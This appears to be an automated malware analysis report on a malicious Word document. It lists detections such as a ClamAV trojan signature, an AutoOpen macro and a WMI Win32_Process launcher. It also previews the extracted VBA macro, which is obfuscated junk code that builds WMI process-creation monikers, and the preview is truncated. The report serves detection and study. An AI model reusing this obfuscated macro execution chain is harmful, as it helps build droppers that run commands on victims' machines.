MALICIOUS
282
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1137.001 Office Application Startup: Office Application
The sample contains a VBA macro with an AutoOpen function, a common technique for executing malicious code upon document opening. The macro utilizes GetObject and CreateObject to launch the Win32_Process WMI object, indicating an attempt to execute arbitrary commands or download additional payloads. The ClamAV detection further supports its malicious nature.
Heuristics 8
-
ClamAV: Doc.Trojan.Agent-6864193-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Agent-6864193-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA WMI Win32_Process launcher critical OLE_VBA_WMI_PROCESS_CREATEVBA macro builds or references a WMI moniker for Win32_Process and invokes .Create to start a command. This is a high-confidence macro execution chain that often hides the WMI class name through string concatenation or helper functions.
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 59752 bytes |
SHA-256: d810e7bbdfe314a8c9a04b99cc80e3670654c5e5a20a9dfadee964d65dfe3d5a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "I65886_7"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "j_301_4"
Function h_80_4()
Select Case R5024__4
Case 808205534
d_2_6286 = Log(H_5551)
F932_2 = CDate(581431024)
A796__61 = Fix(81906182 + 991698083 + a440_3 - Oct(375557815))
z_440897 = Cos(776132838 - Sqr(40906660 - Atn(152188450)) - 410286435 + 183186648)
End Select
Select Case B0_3794
Case 406957235
i__43_1 = Log(j__7513)
A20_35_ = CDate(435500583)
A607__57 = Fix(787165315 + 141496947 + b1_1943 - Oct(620036028))
r_60_0 = Cos(743577404 - Sqr(469632632 - Atn(325863071)) - 715341109 + 597706190)
End Select
Select Case X4_731
Case 253221791
D__400__ = Log(L05_49)
D99_61 = CDate(293870899)
l_022_ = Fix(842989057 + 693218247 + p7_2_2_ - Oct(600724923))
O8_3_3 = Cos(118170281 - Sqr(273805978 - Atn(262335526)) - 371604673 + 815687713)
End Select
Select Case s33___26
Case 525810926
H_0_77_ = Log(a___2_27)
j_6_165_ = CDate(231779199)
c_735836 = Fix(624487944 + 799378154 + T6253__ - Oct(817344290))
j18_308 = Cos(130588229 - Sqr(663713986 - Atn(531091653)) - 795397935 + 61847048)
End Select
Select Case N_739_
Case 120584163
z_2_1010 = Log(z9_0_57)
q76414 = CDate(696160460)
T__561_ = Fix(899525369 + 452633790 + d_306_8 - Oct(479471634))
s36__399 = Cos(43285922 - Sqr(445374551 - Atn(349789030)) - 945857266 + 676970423)
End Select
Select Case V__7471
Case 248743068
A82_3991 = Log(G6__8028)
t__86_2 = CDate(931253698)
i207__2 = Fix(596935752 + 603997771 + F__711__ - Oct(600106463))
w__4_96 = Cos(349501486 - Sqr(544954874 - Atn(700715627)) - 998973140 + 841461371)
End Select
Select Case s087591_
Case 442968360
r672_8 = Log(N8_58722)
E4419_ = CDate(673898688)
i_23738 = Fix(124235128 + 322794035 + O429_3_ - Oct(382599726))
J7_966 = Cos(989071839 - Sqr(823736958 - Atn(752317694)) - 566598719 + 410213981)
End Select
End Function
Function F__31__(z15_3163, b2888_99)
On Error Resume Next
Select Case p86_953_
Case 210385552
o15528_ = Log(h__449_2)
q7__92_1 = CDate(936192825)
L908534 = Fix(813729432 + 53042204 + Q42_82 - Oct(601844588))
D782__5 = Cos(706159686 - Sqr(259948270 - Atn(375302225)) - 500855325 + 859501979)
End Select
Select Case P_5_81__
Case 801647489
C9_85_ = Log(V_8_132)
P80_84 = CDate(631918369)
W_148_6_ = Fix(224575861 + 272668926 + r__82_ - Oct(737722534))
n6__04 = Cos(116194754 - Sqr(374614334 - Atn(502929177)) - 382126723 + 187581181)
End Select
K25_828 = M5__6_4 + "winmgmts:Win32_ProcessStartup" + b30908
Select Case W987___6
Case 260599363
u_8___87 = Log(C710277)
F795797 = CDate(213997182)
I_40_059 = Fix(486151449 + 907082291 + o_6627_ - Oct(697009300))
D966592 = Cos(157970170 - Sqr(390973502 - Atn(740788403)) - 186277019 + 695866603)
End Select
Select Case F60_589
Case 127599242
D00_054 = Log(s__793_)
J66_02_3 = CDate(759741644)
I26_890 = Fix(648286816 + 759457851 + P8___3 - Oct(959767833))
R___9311 = Cos(562963932 - Sqr(920523834 - Atn(485749248)) - 531693326 + 509834134)
End Select
i01___06 = Y3__75__ + "winmgmts:Win32_Process" + r4_504
Select Case W_02669
Case 440720411
T28088 = Log(z_11_26)
p3897_0 = CDate(756832063)
r1245125 = Fix(38911511
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.